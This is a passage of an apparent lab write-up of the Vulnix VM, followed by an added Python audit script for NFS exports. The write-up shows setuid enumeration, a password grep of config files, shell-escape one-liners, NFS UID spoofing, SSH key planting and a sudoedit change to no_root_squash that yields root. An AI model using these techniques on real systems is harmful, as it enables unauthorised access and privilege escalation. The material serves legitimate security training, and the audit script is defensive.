drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/ko
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ko/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ko/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ko/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat7
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat5
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/it
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/it/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/it/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/it/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat4
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/zh_CN
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/zh_CN/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/zh_CN/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/zh_CN/cat5
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/ru
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ru/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ru/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/ru/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat2
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/pl
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pl/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pl/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pl/cat5
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/fr
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fr/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fr/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fr/cat5
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/sv
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/sv/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/sv/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/sv/cat5
drwxr-sr-x 4 man root 4096 Sep 2 2012 /var/cache/man/fr.UTF-8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fr.UTF-8/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fr.UTF-8/cat7
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/es
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/es/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/es/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/es/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat3
drwxr-sr-x 6 man root 4096 Sep 2 2012 /var/cache/man/de
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/de/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/de/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/de/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/de/cat3
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/pt_BR
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pt_BR/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pt_BR/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pt_BR/cat5
drwxr-sr-x 4 man root 4096 Sep 2 2012 /var/cache/man/sl
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/sl/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/sl/cat8
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/zh_TW
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/zh_TW/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/zh_TW/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/zh_TW/cat5
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/nl
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/nl/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/nl/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/nl/cat5
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/cat6
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/tr
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/tr/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/tr/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/tr/cat5
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/pt
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pt/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pt/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/pt/cat5
drwxr-sr-x 5 man root 4096 Sep 2 2012 /var/cache/man/id
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/id/cat1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/id/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/id/cat5
drwxr-sr-x 4 man root 4096 Sep 2 2012 /var/cache/man/fr.ISO8859-1
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fr.ISO8859-1/cat8
drwxr-sr-x 2 man root 4096 Sep 2 2012 /var/cache/man/fr.ISO8859-1/cat7
drwx--s--- 2 postfix postdrop 4096 Oct 16 11:51 /var/spool/postfix/public
drwxrwsr-x 2 libuuid libuuid 4096 Sep 2 2012 /var/lib/libuuid
drwxrwsrwt 2 root whoopsie 4096 Sep 2 2012 /var/crash
drwxrwsr-x 2 root mail 4096 Sep 2 2012 /var/mail
drwxrwsr-x 7 root staff 4096 Sep 2 2012 /usr/local/share/sgml
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/sgml/dtd
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/sgml/entities
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/sgml/stylesheet
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/sgml/declaration
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/sgml/misc
drwxrwsr-x 6 root staff 4096 Sep 2 2012 /usr/local/share/xml
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/xml/entities
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/xml/declaration
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/xml/schema
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/xml/misc
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/share/ca-certificates
drwxrwsr-x 4 root staff 4096 Sep 2 2012 /usr/local/lib/python2.7
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/lib/python2.7/dist-packages
drwxrwsr-x 2 root staff 4096 Sep 2 2012 /usr/local/lib/python2.7/site-packages
-rwsr-sr-x 1 libuuid libuuid 17976 Mar 30 2012 /usr/sbin/uuidd
-r-xr-sr-x 1 root postdrop 13624 Jul 30 2012 /usr/sbin/postdrop
-r-xr-sr-x 1 root postdrop 13608 Jul 30 2012 /usr/sbin/postqueue
-rwsr-xr-- 1 root dip 273272 Feb 4 2011 /usr/sbin/pppd
-rwsr-xr-x 1 root root 5564 Dec 13 2011 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 316824 Feb 22 2012 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 248056 Apr 2 2012 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 9728 Apr 20 2012 /usr/lib/pt_chown
-rwxr-sr-x 1 root ssh 128416 Apr 2 2012 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 18120 Apr 9 2012 /usr/bin/expiry
-rwxr-sr-x 3 root mail 9684 Oct 18 2011 /usr/bin/mail-touchlock
-rwxr-sr-x 3 root mail 9684 Oct 18 2011 /usr/bin/mail-unlock
-rwxr-sr-x 1 root mail 13708 Aug 4 2010 /usr/bin/lockfile
-rwsr-xr-x 1 root root 56208 Jul 28 2011 /usr/bin/mtr
-rwxr-sr-x 1 root mail 9720 Jan 10 2012 /usr/bin/mutt_dotlock
-rwsr-xr-x 2 root root 69708 Jun 1 2012 /usr/bin/sudo
-rwsr-xr-x 1 root root 30896 Apr 9 2012 /usr/bin/newgrp
-rwsr-xr-x 1 root root 41284 Apr 9 2012 /usr/bin/passwd
-rwsr-xr-x 1 root root 40292 Apr 9 2012 /usr/bin/chfn
-rwsr-sr-x 1 daemon daemon 42800 Oct 25 2011 /usr/bin/at
-rwsr-xr-x 2 root root 69708 Jun 1 2012 /usr/bin/sudoedit
-rwxr-sr-x 1 root mail 13932 Oct 17 2011 /usr/bin/dotlockfile
-rwxr-sr-x 1 root tty 18036 Mar 30 2012 /usr/bin/wall
-rwxr-sr-x 1 root shadow 45284 Apr 9 2012 /usr/bin/chage
-rwxr-sr-x 1 root tty 9728 Mar 31 2012 /usr/bin/bsd-write
-rwsr-xr-x 1 root root 14012 Nov 8 2011 /usr/bin/traceroute6.iputils
-rwxr-sr-x 3 root mail 9684 Oct 18 2011 /usr/bin/mail-lock
-rwxr-sr-x 1 root crontab 34776 Jun 19 2012 /usr/bin/crontab
-rwsr-xr-x 1 root root 57956 Apr 9 2012 /usr/bin/gpasswd
-rwxr-sr-x 1 root utmp 365260 Jun 6 2011 /usr/bin/screen
-rwxr-sr-x 1 root mlocate 34432 Aug 17 2011 /usr/bin/mlocate
-rwsr-xr-x 1 root root 31748 Apr 9 2012 /usr/bin/chsh
-rwsr-sr-x 1 root mail 75600 Aug 4 2010 /usr/bin/procmail
-rwsr-xr-x 1 root root 39116 Nov 8 2011 /bin/ping6
-rwsr-xr-x 1 root root 88760 Mar 30 2012 /bin/mount
-rwsr-xr-x 1 root root 67720 Mar 30 2012 /bin/umount
-rwsr-xr-x 1 root root 31116 Apr 9 2012 /bin/su
-rwsr-xr-x 1 root root 34740 Nov 8 2011 /bin/ping
-rwsr-xr-x 1 root root 26252 Mar 2 2012 /bin/fusermount
[+] Logs containing keyword 'password'
[+] Config files containing keyword 'password'
/etc/ssl/openssl.cnf:# input_password = secret
/etc/ssl/openssl.cnf:# output_password = secret
/etc/ssl/openssl.cnf:challengePassword = A challenge password
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for initiator
/etc/iscsi/iscsid.conf:#node.session.auth.password = password
/etc/iscsi/iscsid.conf:# To set a CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#node.session.auth.password_in = password_in
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for the initiator
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password = password
/etc/iscsi/iscsid.conf:# To set a discovery session CHAP username and password for target(s)
/etc/iscsi/iscsid.conf:#discovery.sendtargets.auth.password_in = password_in
/etc/ltrace.conf:; pwd.h
/etc/debconf.conf:# World-readable, and accepts everything but passwords.
/etc/debconf.conf:Reject-Type: password
/etc/debconf.conf:# Not world readable (the default), and accepts only passwords.
/etc/debconf.conf:Name: passwords
/etc/debconf.conf:Accept-Type: password
/etc/debconf.conf:Filename: /var/cache/debconf/passwords.dat
/etc/debconf.conf:# databases, one to hold passwords and one for everything else.
/etc/debconf.conf:Stack: config, passwords
/etc/debconf.conf:# A remote LDAP database. It is also read-only. The password is really
/etc/hdparm.conf:# --security-set-pass Set security password
/etc/hdparm.conf:# security_pass = password
/etc/hdparm.conf:# --user-master Select password to use
/etc/dovecot/conf.d/10-auth.conf:# We also try to handle password changes automatically: If user's previous
/etc/dovecot/conf.d/10-auth.conf:# TTL for negative hits (user not found, password mismatch).
/etc/dovecot/conf.d/10-auth.conf:# Password database is used to verify user's password (and nothing more).
/etc/dovecot/conf.d/10-auth.conf:#!include auth-checkpassword.conf.ext
/etc/dovecot/conf.d/10-ssl.conf:# If key file is password protected, give the password here. Alternatively
/etc/dovecot/conf.d/10-ssl.conf:# root owned 0600 file by using ssl_key_password = <path>.
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
perl--> perl -e 'exec "/bin/bash";'
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || http://www.exploit-db.com/exploits/15023 || Language=c
- Sendpage Local Privilege Escalation || http://www.exploit-db.com/exploits/19933 || Language=ruby**
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || http://www.exploit-db.com/exploits/15944 || Language=c
- CAP_SYS_ADMIN to root Exploit || http://www.exploit-db.com/exploits/15916 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || http://www.exploit-db.com/exploits/1518 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || http://www.exploit-db.com/exploits/25450 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || http://www.exploit-db.com/exploits/25307 || Language=c
Finished
=================================================================================================
Nothing interesting, except that the vulnix user's UID and GID are both set to 2008.
Creating a local user with the same UID gives the option to "cd" into vulnix's NFS share mounted on my host:
[GandoPC ~]# useradd vulnix -u 2008
[GandoPC ~]# su vulnix
[vulnix@GandoPC root]$ cd /mnt/home/vulnix;ls -aul
total 20
drwxr-x--- 2 vulnix vulnix 4096 Oct 20 01:31 .
drwxr-xr-x 3 root root 4096 Aug 7 17:34 ..
-rw-r--r-- 1 vulnix vulnix 220 Sep 2 2012 .bash_logout
-rw-r--r-- 1 vulnix vulnix 3486 Sep 2 2012 .bashrc
-rw-r--r-- 1 vulnix vulnix 675 Sep 2 2012 .profile
Gaining SSH access with the "vulnix" user:
Creating a public/private RSA key pair and copying the public key into the authorized_keys file in vulnix's home directory on the Vulnix host, through the mounted share:
[vulnix@GandoPC vulnix]$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/vulnix/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa.
Your public key has been saved in id_rsa.pub.
The key fingerprint is:
SHA256:ZDJcOnqM13e14G7mMI73sRKZT73V+YCRgQRDSNjIqV8 vulnix@GandoPC
The key's randomart image is:
+---[RSA 2048]----+
| . *.o=o.. |
| =.oo .. . |
| . * o .o. |
| . +EB .oo . |
| .o.+ S .oo+. o|
| .o .+oo o.o|
| o+= +.|
| oo*.o. .|
| ...o+ |
+----[SHA256]-----+
[vulnix@GandoPC vulnix]$ cat id_rsa
id_rsa id_rsa.pub
[vulnix@GandoPC vulnix]$ cat id_rsa.pub > .ssh/authorized_keys
Gaining access to the host using SSH and the private key that was generated:
[vulnix@GandoPC vulnix]$ ssh -i id_rsa vulnix@192.168.43.4
The authenticity of host '192.168.43.4 (192.168.43.4)' can't be established.
ECDSA key fingerprint is SHA256:IGOuLMZRTuUvY58a8TN+ef/1zyRCAHk0qYP4wMViOAg.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/vulnix/.ssh/known_hosts).
Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)
* Documentation: https://help.ubuntu.com/
System information as of Sat Oct 20 00:27:21 BST 2018
System load: 0.0 Processes: 88
Usage of /: 90.2% of 773MB Users logged in: 0
Memory usage: 4% IP address for eth0: 192.168.43.4
Swap usage: 0%
=> / is using 90.2% of 773MB
Graph this data and manage this system at https://landscape.canonical.com/
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Sat Oct 20 00:16:28 2018 from 192.168.43.3
vulnix@vulnix:~$ whoami;ifconfig
vulnix
eth0 Link encap:Ethernet HWaddr 08:00:27:59:f8:53
inet addr:192.168.43.4 Bcast:192.168.43.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe59:f853/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:2670 errors:0 dropped:0 overruns:0 frame:0
TX packets:1176 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:336606 (336.6 KB) TX bytes:222571 (222.5 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:40 errors:0 dropped:0 overruns:0 frame:0
TX packets:40 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:3256 (3.2 KB) TX bytes:3256 (3.2 KB)
I did some manual enumeration and I found this:
vulnix@vulnix:~$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User vulnix may run the following commands on this host:
(root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports
vulnix@vulnix:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix *(rw,root_squash)
I turned off root_squash in /etc/exports:
vulnix@vulnix:~$ sudoedit /etc/exports
vulnix@vulnix:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/ *(rw,no_root_squash)
In order to apply those changes, I had to restart the exportfs service or reboot the machine:
vulnix@vulnix:~$ reboot
reboot: Need to be root
vulnix@vulnix:~$ exit
logout
Connection to 192.168.43.4 closed.
[vulnix@GandoPC vulnix]$ exit
exit
No sudo, so I had to restart the VM in VirtualBox :D
Capturing the trophy:
The Vulnix VM restarted successfully and I got the trophy:
[GandoPC ~]# umount /mnt/home/vulnix
[GandoPC ~]# showmount -e 192.168.43.4
Export list for 192.168.43.4:
/ *
[GandoPC ~]# mkdir /mnt/vulnix_root
[GandoPC ~]# mount 192.168.43.4:/ /mnt/vulnix_root
[GandoPC ~]# cd /mnt/vulnix_root/root;ls -aul
total 28
drwx------ 3 root root 4096 Oct 20 02:52 .
drwxr-xr-x 22 root root 4096 Oct 20 02:49 ..
-rw------- 1 root root 0 Sep 2 2012 .bash_history
-rw-r--r-- 1 root root 3106 Sep 2 2012 .bashrc
drwx------ 2 root root 4096 Sep 2 2012 .cache
-rw-r--r-- 1 root root 140 Sep 2 2012 .profile
-r-------- 1 root root 33 Sep 2 2012 trophy.txt
-rw------- 1 root root 710 Sep 2 2012 .viminfo
[GandoPC root]# cat trophy.txt
cc614640424f5bd60ce5d5264899c3be
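As an added example (my own code, not from the write-up or the Vulnix VM), here is a small audit of the export tables seen above: it parses exports(5) lines and grades each export, flagging everything this walkthrough turned on, an unrestricted client list, rw, no_root_squash, exporting / itself, and the lack of Kerberos (so a client-asserted UID such as 2008 is simply trusted). The names Export, parse_exports and audit_export, and SAMPLE_EXPORTS, are mine; the sample table is constructed from the two states of /etc/exports shown on the page.

```python
"""Audit /etc/exports for the weaknesses this walkthrough relies on.
Added example, not code from the write-up or from the Vulnix VM. It
parses exports(5) syntax (path, then client(options) specs, '#'
comments, backslash continuations) and grades each export. SAMPLE_EXPORTS
is constructed from the two states of /etc/exports shown on the page.
"""
import re
from dataclasses import dataclass

# A spec is 'client', 'client(opt,opt)' or a bare '(opt,opt)' (= anyone).
SPEC_RE = re.compile(r"(\S*?)(?:\(([^)]*)\))?$")

SAMPLE_EXPORTS = """\
# as found on the VM, after the sudoedit, and the NFSv4 example from the file's comments
/home/vulnix *(rw,root_squash)
/ *(rw,no_root_squash)
/srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
"""

@dataclass(frozen=True)
class Export:
    path: str
    client: str     # hostname, netgroup, network, wildcard or '*'
    options: tuple  # options as written, e.g. ('rw', 'no_root_squash')

def parse_exports(text):
    """Return one Export per (path, client) pair in the table."""
    exports, pending = [], ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):                  # continued on next line
            pending += line[:-1] + " "
            continue
        fields, pending = (pending + line).split(), ""
        if not fields:
            continue
        path, specs = fields[0], fields[1:] or ["*"]   # no client = anyone
        for spec in specs:
            client, opts = SPEC_RE.match(spec).groups()
            options = tuple(o.strip() for o in (opts or "").split(",") if o.strip())
            exports.append(Export(path, client or "*", options))
    return exports

def audit_export(e):
    """Grade one export: returns (severity, reasons)."""
    opts = set(e.options)
    anyone = e.client.startswith("*")            # '*' or '*.example.com'
    writable = "rw" in opts
    root_ok = "no_root_squash" in opts           # root_squash is the default
    krb = e.client.startswith("gss/") or any(o.startswith("sec=krb5") for o in opts)
    checks = [
        (anyone, "no client restriction: any host that can reach the server may mount it"),
        (writable, "writable"),
        (root_ok, "no_root_squash: root on the client is root on the share"),
        (e.path == "/", "exports the whole root filesystem"),
        (not krb, "AUTH_SYS only: the server trusts whatever uid/gid the client asserts"),
    ]
    reasons = [msg for hit, msg in checks if hit]
    if root_ok and writable and anyone:
        severity = "critical"
    elif root_ok or (writable and anyone):
        severity = "high"
    elif anyone or writable:
        severity = "medium"
    else:
        severity = "low"
    return severity, reasons

if __name__ == "__main__":
    for e in parse_exports(SAMPLE_EXPORTS):
        severity, reasons = audit_export(e)
        print(f"{severity:8} {e.path} {e.client}({','.join(e.options)})")
        for reason in reasons:
            print("         -", reason)
```

Even the original /home/vulnix export grades "high": root_squash alone does not stop a client that picks the same numeric UID, which is exactly the first step above.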
